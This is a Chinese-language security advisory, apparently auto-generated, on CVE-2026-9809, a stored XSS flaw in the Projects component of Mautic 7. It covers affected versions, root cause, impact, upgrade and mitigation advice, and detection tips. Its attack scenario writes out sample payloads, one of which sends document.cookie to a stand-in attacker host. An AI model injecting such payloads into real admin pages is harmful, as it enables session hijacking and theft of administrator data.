CVE-2026-9809 - Mautic has Stored Cross-Site Scripting (XSS) in Projects Component
CVE-2026-9809是Mautic 7 Projects组件的高危存储型跨站脚本(Stored XSS)漏洞,影响7.0.0至7.1.1版本。攻击者可注入恶意项目名称,在管理员悬停标签时执行脚本,导致后台操作或数据泄露。升级至7.1.2即可修复,临时可限制项目权限缓解风险。
CVE-2026-9809 - Mautic has Stored Cross-Site Scripting (XSS) in Projects Component
📋 漏洞概述
Mautic 7 Projects组件存在存储型XSS漏洞,管理员悬停项目标签时触发恶意脚本,可导致后台操作或数据泄露。
📋 基础信息
| 受影响版本 | Mautic 7.0.0 <= version < 7.1.2(仅含Projects功能的7.x分支受影响,4.x/5.x/6.x不受影响) |
| 漏洞类型 | 存储型跨站脚本(Stored XSS) |
| CVSS | 7.6 · High |
| CVE | CVE-2026-9809 |
🔬 漏洞根因
Mautic 7 Projects组件在管理后台的详细视图(如活动、邮件、表单)中渲染项目标签和弹出框时,未对用户可控的项目名称进行充分的输出编码或HTML净化。攻击者可将恶意脚本作为项目名称注入,该名称经后端存储后未经过滤地嵌入前端页面,导致浏览器执行任意JavaScript。推测:项目名称输入验证过滤不严,且输出时未采用安全的上下文感知编码。
🎯 攻击场景
1. 前提:攻击者拥有Mautic 7中创建或编辑项目的权限(通常为低权限管理员或专门分配了项目权限的用户)。 2. 攻击者创建一个新项目,将项目名称设置为恶意XSS载荷,例如:<img src=x onerror=alert(document.cookie)> 或 <svg/onload=fetch('//attacker.com/steal?c='+document.cookie)>。 3. 将该恶意项目关联到某个实体(如广告系列、邮件或表单),或等待现有实体被关联到此项目。 4. 攻击者诱导具有更高管理权限的用户访问该实体的管理详情页。 5. 当管理员移动鼠标悬停在项目标签或弹窗上时,恶意脚本在管理员浏览器会话中自动执行,攻击者借此窃取会话Cookie、执行敏感操作或篡改系统配置。
💥 漏洞影响
成功利用该漏洞可在目标管理员的浏览器上下文中执行任意JavaScript代码,实现会话劫持、敏感数据窃取(如配置、用户数据)、以管理员身份执行操(如创建管理员账号、修改系统设置、投放恶意内容),从而完全破坏Mautic应用的机密性和完整性。
🛡️ 修复建议
1. 立即升级Mautic至7.1.2或更高版本,该版本已修复项目名称的渲染净化问题。 2. 在升级前,临时严格限制项目创建/编辑权限,仅授予完全可信的管理用户。 3. 在应用层增加输出编码与CSP(内容安全策略)缓解XSS,并审计现有项目名称中是否有可疑脚本内容。
📎 参考链接
- https://nvd.nist.gov/vuln/detail/CVE-2026-9809
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9809
- 原始来源(GitHub-Advisory)
🚨 威胁评估
| 📈 EPSS 利用概率 | 低 (0.2%) (高于 5.9% 的漏洞) |
| 🚨 CISA KEV | 未被已知利用 |
| 🔧 公开 PoC | 暂无公开 PoC |
⚠️ 本文由漏洞情报系统自动生成,仅供安全研究与防御参考。生成时间: 2026-08-03 02:06 | 来源: GitHub-Advisory
🤖 常见问题解答(FAQ)
❓ 如何检测环境中是否存在该漏洞利用痕迹?
检查Mautic项目表中项目名称是否包含HTML标签或脚本代码(如<script>、<img onerror>、<svg onload>等)。同时审查管理员会话日志中是否有异常操作或请求,以及外发网络流量中是否有可疑的数据外传行为。
❓ 该漏洞影响哪些版本?是否需要同时修复4/5/6分支?
仅影响启用Projects功能的Mautic 7.x(7.0.0至7.1.1),7.1.2修复。4.x、5.x、6.x不包含Projects组件,不受此CVE影响,无需因此升级。
❓ 如果暂时无法升级,有哪些临时缓解措施?
限制项目创建和编辑权限至绝对信任的管理员,避免低权限用户操作项目;启用Web应用防火墙(WAF)规则拦截XSS载荷;在应用响应头添加Content-Security-Policy,如script-src 'self',以降低脚本执行风险。